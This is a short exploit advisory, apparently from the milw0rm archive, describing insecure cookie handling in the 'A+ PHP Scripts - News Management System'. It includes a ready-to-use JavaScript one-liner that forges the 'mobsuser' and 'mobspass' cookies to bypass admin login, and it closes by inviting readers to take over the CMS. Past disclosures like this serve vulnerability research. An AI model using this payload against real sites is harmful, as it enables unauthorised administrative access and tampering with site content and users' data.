36 lines
No EOL
1.3 KiB
Text
36 lines
No EOL
1.3 KiB
Text
####################################################################################################
|
|
# #
|
|
# ...:::::A+ PHP Scripts - News Management System Insecure Cookie Handling Vulnerability ::::.... #
|
|
###################################################################################################
|
|
|
|
Virangar Security Team
|
|
|
|
www.virangar.net
|
|
www.virangar.ir
|
|
|
|
--------
|
|
Discoverd By :virangar security team(hadihadi)
|
|
|
|
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
|
|
|
|
& all virangar members & all hackerz
|
|
|
|
greetz:to my best friend in the world hadi_aryaie2004
|
|
& my lovely friend arash(imm02tal)
|
|
-------
|
|
DESCRIPTION:
|
|
|
|
A+ PHP Scripts - News Management System, suffers from insecure cookie handling, when a admin login is successfull the script creates
|
|
a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
|
|
contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
|
|
logged in as a legit admin.
|
|
|
|
---
|
|
exploit:
|
|
javascript:document.cookie = "mobsuser=1; path=/"; document.cookie = "mobspass=1; path=/";
|
|
-----
|
|
now you can get admin access and manage the cms ;)
|
|
-------
|
|
young iranian h4ck3rz
|
|
|
|
# milw0rm.com [2008-06-26] |